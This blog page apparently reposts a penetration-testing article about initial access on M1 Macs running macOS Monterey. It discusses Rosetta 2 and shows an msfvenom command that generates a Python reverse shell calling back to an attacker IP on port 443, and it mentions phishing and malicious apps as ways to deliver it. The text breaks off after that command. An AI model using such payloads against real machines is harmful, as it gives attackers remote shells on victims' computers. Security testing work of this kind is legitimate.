pennylkp.blogg.se

Install msfvenom for mac









Mac-based corporate environments may be rare, but finding a penetration testing team experienced enough to thoroughly test that environment can be even more rare. It’s a niche that is commonly perceived to be more secure than your typical Windows domain out of obscurity, and even more so when you throw M1-based Macs into the mix. I’ll be going over some of Schellman’s methodology on how we approach an internal engagement knowing that we’ll be landing on macOS, and some recommendations to keep that Mac environment secure.

Initial access comes in many forms in macOS, including, but not limited to, malicious documents, Installer packages, executables, or malicious scripts a user may be tricked into running. The testing environment I’ll be working out of is a standard Kali box acting as the attacker, then a 2021 M1 (not M1 Pro or M1 Max, although these chips would be impacted in the same way) MacBook Pro running macOS Monterey version 12.0.1 in a Virtual Machine without Rosetta 2 installed to demonstrate how this affects initial access and tooling.

Fingerprinting an M1 Mac

First, a quick word on M1 Macs and how they act out of the box. Below is a screenshot taken from my freshly deployed Virtual Machine showing the output of the “uname -a” command. From this, we verify it’s running the arm64 version of macOS; also shown are the “About this Mac” pane and, finally, the popup a user receives when trying to run an application not optimized for M1 processors.

Basically, macOS is asking the user to allow Rosetta 2 to be installed, thus allowing x64 / non-M1 optimized applications to run, but how does this affect our payloads if we click Not Now, and does this make the endpoint any more secure?

Let’s start nice and simple with a basic reverse shell. This could be hidden inside a malicious application, a script presented to the user as required for a job function in an email, or quickly run on an unlocked, unmonitored Mac. This example is executed via the Python 2 that ships by default on macOS as of writing. Apple has stated that it will be removed in the future ( \_15-release-notes). The payload is generated via “msfvenom” on our attacker box like below and tells the payload to call back to the attacker’s IP on port 443:

msfvenom -p python/shell_reverse_tcp LHOST=10.0.1.189 LPORT=443










